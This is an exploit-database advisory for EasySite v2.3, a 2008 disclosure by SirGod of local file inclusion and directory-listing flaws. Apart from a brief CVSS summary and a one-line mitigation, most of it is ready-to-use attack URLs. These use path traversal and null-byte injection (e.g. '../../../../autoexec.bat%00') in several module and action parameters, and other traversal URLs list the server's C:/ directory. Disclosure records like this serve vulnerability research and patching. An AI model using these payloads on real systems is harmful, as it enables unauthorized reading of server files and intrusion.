EasySite v2.3 Multiple Remote Vulnerabilities

vendor:

EasySite

by:

SirGod

7.5

CVSS

HIGH

Local File Inclusion, Arbitrary View Folder Contents

22, 23

CWE

Product Name: EasySite

Affected Version From: 2.3

Affected Version To: 2.3

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

EasySite v2.3 Multiple Remote Vulnerabilities

EasySite v2.3 is vulnerable to Local File Inclusion and Arbitrary View Folder Contents. An attacker can exploit this vulnerability by sending maliciously crafted HTTP requests to the vulnerable server. This will allow the attacker to view the contents of the folder and the content of files view via LFI.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application. Also, ensure that the application is running with the least privileges.

Source

Exploit-DB raw data:

####################################################################
[+] EasySite v2.3 Multiple Remote Vulnerabilities   
[+] Discovered By SirGod                          
[+] www.mortal-team.org                          
[+] Greetz : E.M.I.N.E.M, Ras ,Puscas_marin ,ToxicBlood,MesSiAH,xZu,HrN
####################################################################

[+] Local File Inclusion

http://localhost/www/index.php?module=Accueil&action=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?module=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?ss_module=../../../../autoexec.bat%00
http://localhost/modules/Module/index.php?ss_action=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?ss_action=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?ss_module=../../../../autoexec.bat%00
http://localhost/modules/Themes/index.php?module=../../../../autoexec.bat%00

And many others...

This will open autoexec.bat

[+] Arbitrary View Folder Contents

You can view the folder contents and the content of files view via LFI.

    http://localhost/www/index.php?module=../../../

    http://localhost/inc/vmenu.php?module=../../../

This will open C:/ directory and will show all the files from C:/ .

Example :

    * BOOTSECT.BAK
    * BcBtRmv.log
    * IO.SYS
    * MSDOS.SYS
    * autoexec.bat
    * bootmgr
    * config.sys
    * grldr
    * hiberfil.sys
    * pagefile.sys

####################################################################

# milw0rm.com [2008-08-21]